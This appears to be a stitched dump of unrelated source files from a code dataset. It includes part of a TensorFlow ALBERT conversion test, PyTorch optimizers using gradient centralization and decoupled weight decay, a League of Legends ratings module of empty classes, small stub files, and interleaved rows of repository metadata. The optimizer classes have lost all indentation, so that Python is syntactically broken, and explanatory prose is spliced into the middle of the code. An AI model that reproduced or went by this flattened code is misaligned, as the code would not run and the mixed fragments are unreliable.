        "tf_albert_for_masked_lm/predictions/dense/bias:0",
        "tf_albert_for_masked_lm/predictions/LayerNorm/gamma:0",
        "tf_albert_for_masked_lm/predictions/LayerNorm/beta:0",
    ]
    tf_vars = [
        "tf_transformers/albert/logits_bias/bias:0",
        "tf_transformers/albert/mlm/transform/dense/kernel:0",
        "tf_transformers/albert/mlm/transform/dense/bias:0",
        "tf_transformers/albert/mlm/transform/LayerNorm/gamma:0",
        "tf_transformers/albert/mlm/transform/LayerNorm/beta:0",
    ]
    mapping_dict = dict(zip(tf_vars, hf_vars))
    # HF model variable name to variable values, for fast retrieval
    hf_variable_dict = {var.name: var for var in model_hf.variables}
    for var in model.variables:
        if var.name in tf_vars:
            hf_var_name = mapping_dict[var.name]
            var.assign(hf_variable_dict[hf_var_name])

    if SKIP_ASSERT is False:
        inputs = tokenizer(text, return_tensors="tf")
        outputs_hf_mlm = model_hf(**inputs)
        text_hf = tokenizer.decode(tf.argmax(outputs_hf_mlm[0], axis=2)[0])
        del model_hf

        inputs_tf = {}
        inputs_tf["input_ids"] = inputs["input_ids"]
        inputs_tf["input_type_ids"] = inputs["token_type_ids"]
        inputs_tf["input_mask"] = inputs["attention_mask"]
        outputs_tf = model(inputs_tf)
        text_tf = tokenizer.decode(tf.argmax(outputs_tf["token_logits"], axis=2)[0])
        assert text_hf == text_tf
        outputs_tf = tf.argmax(outputs_tf["token_embeddings"], axis=2)[0].numpy()
        if keras_utils.get_policy_name() == 'float32':
            tf.debugging.assert_equal(outputs_hf, outputs_tf)


# File: iglovikov_helper_functions/dl/pytorch/optimizers.py (repo: AIChuY/iglovikov_helper_functions)

"""
From https://github.com/Yonghongwei/Gradient-Centralization
"""
import math
import torch
from torch.optim.optimizer import Optimizer, required # type: ignore
class AdamW_GCC(Optimizer):
r"""Implements AdamW with Gradient Centralization (GC) applied to conv-layer gradients.
It has been proposed in `Adam: A Method for Stochastic Optimization`_.
Arguments:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float, optional): learning rate (default: 1e-3)
betas (Tuple[float, float], optional): coefficients used for computing
running averages of gradient and its square (default: (0.9, 0.999))
eps (float, optional): term added to the denominator to improve
numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
amsgrad (boolean, optional): whether to use the AMSGrad variant of this
algorithm from the paper `On the Convergence of Adam and Beyond`_
.. _Adam\: A Method for Stochastic Optimization:
https://arxiv.org/abs/1412.6980
.. _On the Convergence of Adam and Beyond:
https://openreview.net/forum?id=ryQu7f-RZ
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, weight_decay=0, amsgrad=False):
if lr < 0:
raise ValueError(f"Invalid learning rate: {lr}")
if eps < 0:
raise ValueError(f"Invalid epsilon value: {eps}")
if not 0.0 <= betas[0] < 1.0:
raise ValueError(f"Invalid beta parameter at index 0: {betas[0]}")
if not 0.0 <= betas[1] < 1.0:
raise ValueError(f"Invalid beta parameter at index 1: {betas[1]}")
defaults = {"lr": lr, "betas": betas, "eps": eps, "weight_decay": weight_decay, "amsgrad": amsgrad}
super().__init__(params, defaults)
def __setstate__(self, state):
super().__setstate__(state)
for group in self.param_groups:
group.setdefault("amsgrad", False)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group["params"]:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError("Adam does not support sparse gradients, please consider SparseAdam instead")
amsgrad = group["amsgrad"]
state = self.state[p]
# State initialization
if len(state) == 0:
state["step"] = 0
# Exponential moving average of gradient values
state["exp_avg"] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state["exp_avg_sq"] = torch.zeros_like(p.data)
if amsgrad:
# Maintains max of all exp. moving avg. of sq. grad. values
state["max_exp_avg_sq"] = torch.zeros_like(p.data)
exp_avg, exp_avg_sq = state["exp_avg"], state["exp_avg_sq"]
if amsgrad:
max_exp_avg_sq = state["max_exp_avg_sq"]
beta1, beta2 = group["betas"]
# GC operation for Conv layers
if grad.dim() > 3:
grad.add_(-grad.mean(dim=tuple(range(1, grad.dim())), keepdim=True))
state["step"] += 1
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(grad, alpha=1 - beta1)
exp_avg_sq.mul_(beta2).addcmul_(grad, grad, value=1 - beta2)
if amsgrad:
# Maintains the maximum of all 2nd moment running avg. till now
torch.max(max_exp_avg_sq, exp_avg_sq, out=max_exp_avg_sq)
# Use the max. for normalizing running avg. of gradient
denom = max_exp_avg_sq.sqrt().add_(group["eps"])
else:
denom = exp_avg_sq.sqrt().add_(group["eps"])
bias_correction1 = 1 - beta1 ** state["step"]
bias_correction2 = 1 - beta2 ** state["step"]
step_size = group["lr"] * math.sqrt(bias_correction2) / bias_correction1  # skipcq PTC-W0028
# p.data.addcdiv_(exp_avg, denom, value=-step_size)
p.data.add_(torch.mul(p.data, group["weight_decay"]).addcdiv_(exp_avg, denom), alpha=-step_size)
return loss
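The step size in `AdamW_GCC.step()` applies Adam's bias correction, `lr * sqrt(1 - beta2**t) / (1 - beta1**t)`. A small self-contained check of that formula (the helper name and the sample values are illustrative, not part of the module):

```python
import math

def adam_step_size(lr, beta1, beta2, t):
    # Bias-corrected step size, as computed inside AdamW_GCC.step().
    return lr * math.sqrt(1 - beta2 ** t) / (1 - beta1 ** t)

# At t=1 the correction is largest; as t grows it decays toward plain lr.
s1 = adam_step_size(1e-3, 0.9, 0.999, 1)
s_late = adam_step_size(1e-3, 0.9, 0.999, 10 ** 6)
```

With the default betas the correction shrinks the effective step early in training, which is exactly what prevents the first few updates from being dominated by the still-biased second-moment estimate.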
class SGD_GCC(Optimizer):
def __init__(self, params, lr=required, momentum=0, dampening=0, weight_decay=0, nesterov=False):
if lr is not required and lr < 0.0:
raise ValueError(f"Invalid learning rate: {lr}")
if momentum < 0.0:
raise ValueError(f"Invalid momentum value: {momentum}")
if weight_decay < 0.0:
raise ValueError(f"Invalid weight_decay value: {weight_decay}")
defaults = {
"lr": lr,
"momentum": momentum,
"dampening": dampening,
"weight_decay": weight_decay,
"nesterov": nesterov,
}
if nesterov and (momentum <= 0 or dampening != 0):
raise ValueError("Nesterov momentum requires a momentum and zero dampening")
super().__init__(params, defaults)
def __setstate__(self, state):
super().__setstate__(state)
for group in self.param_groups:
group.setdefault("nesterov", False)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
weight_decay = group["weight_decay"]
momentum = group["momentum"]
dampening = group["dampening"]
nesterov = group["nesterov"]
for p in group["params"]:
if p.grad is None:
continue
d_p = p.grad.data
if weight_decay != 0:
d_p.add_(p.data, alpha=weight_decay)
# GC operation for Conv layers
if d_p.dim() > 3:
d_p.add_(-d_p.mean(dim=tuple(range(1, d_p.dim())), keepdim=True))
if momentum != 0:
param_state = self.state[p]
if "momentum_buffer" not in param_state:
buf = param_state["momentum_buffer"] = torch.clone(d_p).detach()
else:
buf = param_state["momentum_buffer"]
buf.mul_(momentum).add_(d_p, alpha=1 - dampening)
if nesterov:
d_p = d_p.add(buf, alpha=momentum)
else:
d_p = buf
p.data.add_(d_p, alpha=-group["lr"])
return loss
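The GC operation in the optimizers above subtracts, per output filter (the first tensor dimension), the mean of that filter's gradient entries, so each filter's gradient has zero mean. A torch-free sketch, representing a conv gradient of shape `(out, in, kh, kw)` as one flattened row per filter (`centralize` is an illustrative helper, not part of this module):

```python
def centralize(grad_rows):
    # Subtract each row's mean from its entries: the list analogue of
    # grad.add_(-grad.mean(dim=(1, 2, 3), keepdim=True)) for a 4-D tensor.
    out = []
    for row in grad_rows:
        mean = sum(row) / len(row)
        out.append([v - mean for v in row])
    return out

g = centralize([[1.0, 2.0, 3.0], [4.0, 4.0, 4.0]])
# every centralized row sums to zero
```

`SGD_GCC` applies this only when the gradient has more than 3 dimensions (conv kernels), while `SGD_GC` applies it to anything 2-D or larger (conv and FC layers).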
class SGD_GC(Optimizer):
def __init__(self, params, lr=required, momentum=0, dampening=0, weight_decay=0, nesterov=False):
if lr is not required and lr < 0.0:
raise ValueError(f"Invalid learning rate: {lr}")
if momentum < 0.0:
raise ValueError(f"Invalid momentum value: {momentum}")
if weight_decay < 0.0:
raise ValueError(f"Invalid weight_decay value: {weight_decay}")
defaults = {
"lr": lr,
"momentum": momentum,
"dampening": dampening,
"weight_decay": weight_decay,
"nesterov": nesterov,
}
if nesterov and (momentum <= 0 or dampening != 0):
raise ValueError("Nesterov momentum requires a momentum and zero dampening")
super().__init__(params, defaults)
def __setstate__(self, state):
super().__setstate__(state)
for group in self.param_groups:
group.setdefault("nesterov", False)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
weight_decay = group["weight_decay"]
momentum = group["momentum"]
dampening = group["dampening"]
nesterov = group["nesterov"]
for p in group["params"]:
if p.grad is None:
continue
d_p = p.grad.data
if weight_decay != 0:
d_p.add_(p.data, alpha=weight_decay)
# GC operation for Conv layers and FC layers
if d_p.dim() > 1:
d_p.add_(-d_p.mean(dim=tuple(range(1, d_p.dim())), keepdim=True))
if momentum != 0:
param_state = self.state[p]
if "momentum_buffer" not in param_state:
buf = param_state["momentum_buffer"] = torch.clone(d_p).detach()
else:
buf = param_state["momentum_buffer"]
buf.mul_(momentum).add_(d_p, alpha=1 - dampening)
if nesterov:
d_p = d_p.add(buf, alpha=momentum)
else:
d_p = buf
p.data.add_(d_p, alpha=-group["lr"])
return loss
class SGDW(Optimizer):
def __init__(self, params, lr=required, momentum=0, dampening=0, weight_decay=0, nesterov=False):
if lr is not required and lr < 0.0:
raise ValueError(f"Invalid learning rate: {lr}")
if momentum < 0.0:
raise ValueError(f"Invalid momentum value: {momentum}")
if weight_decay < 0.0:
raise ValueError(f"Invalid weight_decay value: {weight_decay}")
defaults = {
"lr": lr,
"momentum": momentum,
"dampening": dampening,
"weight_decay": weight_decay,
"nesterov": nesterov,
}
if nesterov and (momentum <= 0 or dampening != 0):
raise ValueError("Nesterov momentum requires a momentum and zero dampening")
super().__init__(params, defaults)
def __setstate__(self, state):
super().__setstate__(state)
for group in self.param_groups:
group.setdefault("nesterov", False)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
weight_decay = group["weight_decay"]
momentum = group["momentum"]
dampening = group["dampening"]
nesterov = group["nesterov"]
for p in group["params"]:
if p.grad is None:
continue
d_p = p.grad.data
old = torch.clone(p.data).detach()
# weight decay is decoupled: applied directly to the old weights after the
# gradient step below, not folded into d_p as an L2 penalty
if momentum != 0:
param_state = self.state[p]
if "momentum_buffer" not in param_state:
buf = param_state["momentum_buffer"] = torch.zeros_like(p.data)
buf.mul_(momentum).add_(d_p)
else:
buf = param_state["momentum_buffer"]
buf.mul_(momentum).add_(d_p, alpha=1 - dampening)
if nesterov:
d_p = d_p.add(buf, alpha=momentum)
else:
d_p = buf
p.data.add_(d_p, alpha=-group["lr"])
if weight_decay != 0:
p.data.add_(old, alpha=-weight_decay * group["lr"])
return loss
class SGDW_GCC(Optimizer):
def __init__(self, params, lr=required, momentum=0, dampening=0, weight_decay=0, nesterov=False):
if lr is not required and lr < 0.0:
raise ValueError(f"Invalid learning rate: {lr}")
if momentum < 0.0:
raise ValueError(f"Invalid momentum value: {momentum}")
if weight_decay < 0.0:
raise ValueError(f"Invalid weight_decay value: {weight_decay}")
defaults = {
"lr": lr,
"momentum": momentum,
"dampening": dampening,
"weight_decay": weight_decay,
"nesterov": nesterov,
}
if nesterov and (momentum <= 0 or dampening != 0):
raise ValueError("Nesterov momentum requires a momentum and zero dampening")
super().__init__(params, defaults)
def __setstate__(self, state):
super().__setstate__(state)
for group in self.param_groups:
group.setdefault("nesterov", False)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
weight_decay = group["weight_decay"]
momentum = group["momentum"]
dampening = group["dampening"]
nesterov = group["nesterov"]
for p in group["params"]:
if p.grad is None:
continue
d_p = p.grad.data
old = torch.clone(p.data).detach()
# weight decay is decoupled: applied directly to the old weights after the
# gradient step below, not folded into d_p as an L2 penalty
# GC operation for Conv layers
if d_p.dim() > 3:
d_p.add_(-d_p.mean(dim=tuple(range(1, d_p.dim())), keepdim=True))
if momentum != 0:
param_state = self.state[p]
if "momentum_buffer" not in param_state:
buf = param_state["momentum_buffer"] = torch.zeros_like(p.data)
buf.mul_(momentum).add_(d_p)
else:
buf = param_state["momentum_buffer"]
buf.mul_(momentum).add_(d_p, alpha=1 - dampening)
if nesterov:
d_p = d_p.add(buf, alpha=momentum)
else:
d_p = buf
p.data.add_(d_p, alpha=-group["lr"])
if weight_decay != 0:
p.data.add_(old, alpha=-weight_decay * group["lr"])
return loss
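SGDW and SGDW_GCC decouple weight decay from the gradient: the decay term is applied to the weight value saved before the step (`p <- p - lr*d_p - lr*wd*p_old`), instead of being added to the gradient as a plain L2 penalty. A scalar sketch of one such update, using plain floats in place of tensors (`sgdw_update` and the sample values are illustrative only):

```python
def sgdw_update(p, d_p, lr, wd):
    # Decoupled weight decay: the decay uses the pre-step weight `old`,
    # mirroring the `old = torch.clone(p.data)` bookkeeping above.
    old = p
    p = p - lr * d_p
    if wd != 0:
        p = p - wd * lr * old
    return p

p_new = sgdw_update(1.0, 0.5, 0.1, 0.01)
```

With `wd=0` this reduces to plain SGD, which is why the in-gradient decay lines are absent from these two classes.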
| 38.258794 | 116 | 0.533789 | 1,742 | 15,227 | 4.491963 | 0.122847 | 0.070288 | 0.040895 | 0.030415 | 0.77099 | 0.74901 | 0.739808 | 0.720128 | 0.70901 | 0.692652 | 0 | 0.014389 | 0.365601 | 15,227 | 397 | 117 | 38.355164 | 0.795652 | 0.15814 | 0 | 0.817164 | 0 | 0 | 0.123144 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05597 | false | 0 | 0.011194 | 0 | 0.104478 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ba83e5bbee2aaa924558284417a6ab9c17bef2f4 | 6,821 | py | Python | loldib/getratings/models/NA/na_nocturne/na_nocturne_bot.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_nocturne/na_nocturne_bot.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_nocturne/na_nocturne_bot.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | from getratings.models.ratings import Ratings
class NA_Nocturne_Bot_Aatrox(Ratings):
pass
class NA_Nocturne_Bot_Ahri(Ratings):
pass
class NA_Nocturne_Bot_Akali(Ratings):
pass
class NA_Nocturne_Bot_Alistar(Ratings):
pass
class NA_Nocturne_Bot_Amumu(Ratings):
pass
class NA_Nocturne_Bot_Anivia(Ratings):
pass
class NA_Nocturne_Bot_Annie(Ratings):
pass
class NA_Nocturne_Bot_Ashe(Ratings):
pass
class NA_Nocturne_Bot_AurelionSol(Ratings):
pass
class NA_Nocturne_Bot_Azir(Ratings):
pass
class NA_Nocturne_Bot_Bard(Ratings):
pass
class NA_Nocturne_Bot_Blitzcrank(Ratings):
pass
class NA_Nocturne_Bot_Brand(Ratings):
pass
class NA_Nocturne_Bot_Braum(Ratings):
pass
class NA_Nocturne_Bot_Caitlyn(Ratings):
pass
class NA_Nocturne_Bot_Camille(Ratings):
pass
class NA_Nocturne_Bot_Cassiopeia(Ratings):
pass
class NA_Nocturne_Bot_Chogath(Ratings):
pass
class NA_Nocturne_Bot_Corki(Ratings):
pass
class NA_Nocturne_Bot_Darius(Ratings):
pass
class NA_Nocturne_Bot_Diana(Ratings):
pass
class NA_Nocturne_Bot_Draven(Ratings):
pass
class NA_Nocturne_Bot_DrMundo(Ratings):
pass
class NA_Nocturne_Bot_Ekko(Ratings):
pass
class NA_Nocturne_Bot_Elise(Ratings):
pass
class NA_Nocturne_Bot_Evelynn(Ratings):
pass
class NA_Nocturne_Bot_Ezreal(Ratings):
pass
class NA_Nocturne_Bot_Fiddlesticks(Ratings):
pass
class NA_Nocturne_Bot_Fiora(Ratings):
pass
class NA_Nocturne_Bot_Fizz(Ratings):
pass
class NA_Nocturne_Bot_Galio(Ratings):
pass
class NA_Nocturne_Bot_Gangplank(Ratings):
pass
class NA_Nocturne_Bot_Garen(Ratings):
pass
class NA_Nocturne_Bot_Gnar(Ratings):
pass
class NA_Nocturne_Bot_Gragas(Ratings):
pass
class NA_Nocturne_Bot_Graves(Ratings):
pass
class NA_Nocturne_Bot_Hecarim(Ratings):
pass
class NA_Nocturne_Bot_Heimerdinger(Ratings):
pass
class NA_Nocturne_Bot_Illaoi(Ratings):
pass
class NA_Nocturne_Bot_Irelia(Ratings):
pass
class NA_Nocturne_Bot_Ivern(Ratings):
pass
class NA_Nocturne_Bot_Janna(Ratings):
pass
class NA_Nocturne_Bot_JarvanIV(Ratings):
pass
class NA_Nocturne_Bot_Jax(Ratings):
pass
class NA_Nocturne_Bot_Jayce(Ratings):
pass
class NA_Nocturne_Bot_Jhin(Ratings):
pass
class NA_Nocturne_Bot_Jinx(Ratings):
pass
class NA_Nocturne_Bot_Kalista(Ratings):
pass
class NA_Nocturne_Bot_Karma(Ratings):
pass
class NA_Nocturne_Bot_Karthus(Ratings):
pass
class NA_Nocturne_Bot_Kassadin(Ratings):
pass
class NA_Nocturne_Bot_Katarina(Ratings):
pass
class NA_Nocturne_Bot_Kayle(Ratings):
pass
class NA_Nocturne_Bot_Kayn(Ratings):
pass
class NA_Nocturne_Bot_Kennen(Ratings):
pass
class NA_Nocturne_Bot_Khazix(Ratings):
pass
class NA_Nocturne_Bot_Kindred(Ratings):
pass
class NA_Nocturne_Bot_Kled(Ratings):
pass
class NA_Nocturne_Bot_KogMaw(Ratings):
pass
class NA_Nocturne_Bot_Leblanc(Ratings):
pass
class NA_Nocturne_Bot_LeeSin(Ratings):
pass
class NA_Nocturne_Bot_Leona(Ratings):
pass
class NA_Nocturne_Bot_Lissandra(Ratings):
pass
class NA_Nocturne_Bot_Lucian(Ratings):
pass
class NA_Nocturne_Bot_Lulu(Ratings):
pass
class NA_Nocturne_Bot_Lux(Ratings):
pass
class NA_Nocturne_Bot_Malphite(Ratings):
pass
class NA_Nocturne_Bot_Malzahar(Ratings):
pass
class NA_Nocturne_Bot_Maokai(Ratings):
pass
class NA_Nocturne_Bot_MasterYi(Ratings):
pass
class NA_Nocturne_Bot_MissFortune(Ratings):
pass
class NA_Nocturne_Bot_MonkeyKing(Ratings):
pass
class NA_Nocturne_Bot_Mordekaiser(Ratings):
pass
class NA_Nocturne_Bot_Morgana(Ratings):
pass
class NA_Nocturne_Bot_Nami(Ratings):
pass
class NA_Nocturne_Bot_Nasus(Ratings):
pass
class NA_Nocturne_Bot_Nautilus(Ratings):
pass
class NA_Nocturne_Bot_Nidalee(Ratings):
pass
class NA_Nocturne_Bot_Nocturne(Ratings):
pass
class NA_Nocturne_Bot_Nunu(Ratings):
pass
class NA_Nocturne_Bot_Olaf(Ratings):
pass
class NA_Nocturne_Bot_Orianna(Ratings):
pass
class NA_Nocturne_Bot_Ornn(Ratings):
pass
class NA_Nocturne_Bot_Pantheon(Ratings):
pass
class NA_Nocturne_Bot_Poppy(Ratings):
pass
class NA_Nocturne_Bot_Quinn(Ratings):
pass
class NA_Nocturne_Bot_Rakan(Ratings):
pass
class NA_Nocturne_Bot_Rammus(Ratings):
pass
class NA_Nocturne_Bot_RekSai(Ratings):
pass
class NA_Nocturne_Bot_Renekton(Ratings):
pass
class NA_Nocturne_Bot_Rengar(Ratings):
pass
class NA_Nocturne_Bot_Riven(Ratings):
pass
class NA_Nocturne_Bot_Rumble(Ratings):
pass
class NA_Nocturne_Bot_Ryze(Ratings):
pass
class NA_Nocturne_Bot_Sejuani(Ratings):
pass
class NA_Nocturne_Bot_Shaco(Ratings):
pass
class NA_Nocturne_Bot_Shen(Ratings):
pass
class NA_Nocturne_Bot_Shyvana(Ratings):
pass
class NA_Nocturne_Bot_Singed(Ratings):
pass
class NA_Nocturne_Bot_Sion(Ratings):
pass
class NA_Nocturne_Bot_Sivir(Ratings):
pass
class NA_Nocturne_Bot_Skarner(Ratings):
pass
class NA_Nocturne_Bot_Sona(Ratings):
pass
class NA_Nocturne_Bot_Soraka(Ratings):
pass
class NA_Nocturne_Bot_Swain(Ratings):
pass
class NA_Nocturne_Bot_Syndra(Ratings):
pass
class NA_Nocturne_Bot_TahmKench(Ratings):
pass
class NA_Nocturne_Bot_Taliyah(Ratings):
pass
class NA_Nocturne_Bot_Talon(Ratings):
pass
class NA_Nocturne_Bot_Taric(Ratings):
pass
class NA_Nocturne_Bot_Teemo(Ratings):
pass
class NA_Nocturne_Bot_Thresh(Ratings):
pass
class NA_Nocturne_Bot_Tristana(Ratings):
pass
class NA_Nocturne_Bot_Trundle(Ratings):
pass
class NA_Nocturne_Bot_Tryndamere(Ratings):
pass
class NA_Nocturne_Bot_TwistedFate(Ratings):
pass
class NA_Nocturne_Bot_Twitch(Ratings):
pass
class NA_Nocturne_Bot_Udyr(Ratings):
pass
class NA_Nocturne_Bot_Urgot(Ratings):
pass
class NA_Nocturne_Bot_Varus(Ratings):
pass
class NA_Nocturne_Bot_Vayne(Ratings):
pass
class NA_Nocturne_Bot_Veigar(Ratings):
pass
class NA_Nocturne_Bot_Velkoz(Ratings):
pass
class NA_Nocturne_Bot_Vi(Ratings):
pass
class NA_Nocturne_Bot_Viktor(Ratings):
pass
class NA_Nocturne_Bot_Vladimir(Ratings):
pass
class NA_Nocturne_Bot_Volibear(Ratings):
pass
class NA_Nocturne_Bot_Warwick(Ratings):
pass
class NA_Nocturne_Bot_Xayah(Ratings):
pass
class NA_Nocturne_Bot_Xerath(Ratings):
pass
class NA_Nocturne_Bot_XinZhao(Ratings):
pass
class NA_Nocturne_Bot_Yasuo(Ratings):
pass
class NA_Nocturne_Bot_Yorick(Ratings):
pass
class NA_Nocturne_Bot_Zac(Ratings):
pass
class NA_Nocturne_Bot_Zed(Ratings):
pass
class NA_Nocturne_Bot_Ziggs(Ratings):
pass
class NA_Nocturne_Bot_Zilean(Ratings):
pass
class NA_Nocturne_Bot_Zyra(Ratings):
pass
| 16.357314 | 46 | 0.776133 | 972 | 6,821 | 5.020576 | 0.151235 | 0.197951 | 0.42418 | 0.509016 | 0.814139 | 0.814139 | 0 | 0 | 0 | 0 | 0 | 0 | 0.162879 | 6,821 | 416 | 47 | 16.396635 | 0.854641 | 0 | 0 | 0.498195 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.498195 | 0.00361 | 0 | 0.501805 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
ba8e7fad0df1057110ed00c412b2385782e55468 | 7 | py | Python | python/testData/psi/SliceList.py | jnthn/intellij-community | 8fa7c8a3ace62400c838e0d5926a7be106aa8557 | [
"Apache-2.0"
] | 2 | 2019-04-28T07:48:50.000Z | 2020-12-11T14:18:08.000Z | python/testData/psi/SliceList.py | jnthn/intellij-community | 8fa7c8a3ace62400c838e0d5926a7be106aa8557 | [
"Apache-2.0"
] | 173 | 2018-07-05T13:59:39.000Z | 2018-08-09T01:12:03.000Z | python/testData/psi/SliceList.py | jnthn/intellij-community | 8fa7c8a3ace62400c838e0d5926a7be106aa8557 | [
"Apache-2.0"
] | 2 | 2020-03-15T08:57:37.000Z | 2020-04-07T04:48:14.000Z | a[b1,:] | 7 | 7 | 0.428571 | 2 | 7 | 1.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 0 | 7 | 1 | 7 | 7 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ba9becbbc55fb9f56c798be925fbf9607568b84b | 25 | py | Python | engine/__init__.py | yuanming-hu/elements | e9eccbd61ac45f178ea88b7b405aa2c01549337d | [
"MIT"
] | 265 | 2020-01-09T05:05:26.000Z | 2022-03-31T11:47:32.000Z | engine/__init__.py | TREYWANGCQU/taichi_elements | 6f8a03dcf5b407841b88f7b60cca2619e5cb79a5 | [
"MIT"
] | 76 | 2020-01-09T10:58:48.000Z | 2022-03-26T23:51:32.000Z | engine/__init__.py | TREYWANGCQU/taichi_elements | 6f8a03dcf5b407841b88f7b60cca2619e5cb79a5 | [
"MIT"
] | 50 | 2020-01-11T11:25:39.000Z | 2022-02-20T14:43:36.000Z | from . import mpm_solver
| 12.5 | 24 | 0.8 | 4 | 25 | 4.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 25 | 1 | 25 | 25 | 0.904762 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
baa80674137e50b54fb7bc6aed3d4bd172f47620 | 31 | py | Python | second.py | yan16032/car | dcb05df25dac5aee3608d3b0268fe5474797bef4 | [
"Apache-2.0"
] | null | null | null | second.py | yan16032/car | dcb05df25dac5aee3608d3b0268fe5474797bef4 | [
"Apache-2.0"
] | null | null | null | second.py | yan16032/car | dcb05df25dac5aee3608d3b0268fe5474797bef4 | [
"Apache-2.0"
] | 1 | 2019-01-19T07:11:04.000Z | 2019-01-19T07:11:04.000Z | print('I like play basketball') | 31 | 31 | 0.774194 | 5 | 31 | 4.8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096774 | 31 | 1 | 31 | 31 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0.6875 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
244ed0dbac6f6997ddef2bc5ce039049b220e51b | 24 | py | Python | tests/resource_management/core/resources/system.py | zhangyyun/ambari-presto-service | 51be4327dbd51bf3a1e8e40d05c2c2963de08766 | [
"Apache-2.0"
] | 46 | 2015-09-19T00:33:26.000Z | 2021-10-20T21:17:14.000Z | tests/resource_management/core/resources/system.py | zhangyyun/ambari-presto-service | 51be4327dbd51bf3a1e8e40d05c2c2963de08766 | [
"Apache-2.0"
] | 32 | 2015-09-15T20:58:25.000Z | 2020-04-09T08:56:00.000Z | tests/resource_management/core/resources/system.py | zhangyyun/ambari-presto-service | 51be4327dbd51bf3a1e8e40d05c2c2963de08766 | [
"Apache-2.0"
] | 48 | 2016-01-08T21:00:46.000Z | 2022-03-24T02:32:54.000Z | def Execute():
pass
| 8 | 14 | 0.583333 | 3 | 24 | 4.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.291667 | 24 | 2 | 15 | 12 | 0.823529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
79f7d4a0d30613931c5f898c20f1b20986831d9d | 29 | py | Python | py/__init__.py | iirthw/quick_tracer | 23ac768c029bef0183b3736b6c9c08b66efd0588 | [
"MIT"
] | null | null | null | py/__init__.py | iirthw/quick_tracer | 23ac768c029bef0183b3736b6c9c08b66efd0588 | [
"MIT"
